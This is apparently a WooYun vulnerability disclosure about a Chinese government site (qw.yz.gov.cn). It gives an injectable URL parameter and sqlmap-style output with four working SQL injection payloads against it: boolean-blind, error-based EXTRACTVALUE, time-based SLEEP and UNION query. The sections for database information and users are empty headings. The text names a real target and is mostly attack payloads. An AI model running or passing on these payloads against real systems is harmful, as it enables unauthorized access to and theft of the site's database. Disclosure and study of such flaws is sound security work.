WooYun.org

1.扬中侨网
http://qw.yz.gov.cn/index.php

2.SQL注入
[!] Injection:qw.yz.gov.cn/news_content.php?id=1095
[*] data=[{u'status': 1, u'type': 0, u'value': [{u'dbms': u'MySQL', u'suffix': u'', u'clause': [1, 2, 3], u'ptype': 1, u'dbms_version': [u'>= 5.1'], u'prefix': u'', u'place': u'GET', u'data': {u'1': {u'comment': u'', u'matchRatio': None, u'title': u'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause', u'templatePayload': None, u'vector': u'RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))', u'where': 1, u'payload': u'id=1095 RLIKE (SELECT (CASE WHEN (1379=1379) THEN 1095 ELSE 0x28 END))'}, u'2': {u'comment': u'', u'matchRatio': None, u'title': u'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)', u'templatePayload': None, u'vector': u"(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))", u'where': 3, u'payload': u'id=(EXTRACTVALUE(2323,CONCAT(0x5c,0x7176717071,(SELECT (ELT(2323=2323,1))),0x71707a7071)))'}, u'5': {u'comment': u'', u'matchRatio': None, u'title': u'MySQL >= 5.0.12 AND time-based blind', u'templatePayload': None, u'vector': u'AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])', u'where': 1, u'payload': u'id=1095 AND SLEEP([SLEEPTIME])'}, u'6': {u'comment': u'-- ', u'matchRatio': None, u'title': u'Generic UNION query (NULL) - 1 to 20 columns', u'templatePayload': None, u'vector': [1, 52, u'-- ', u'', u'', u'NULL', 2, True, False], u'where': 2, u'payload': u'id=-5724 UNION ALL SELECT NULL,CONCAT(0x7176717071,0x6f486e4c554752564350,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- '}}, u'conf': {u'string': None, u'notString': None, u'titles': False, u'regexp': None, u'textOnly': False, u'optimize': False}, u'parameter': u'id', u'os': None}]}]
3.数据库信息

4.用户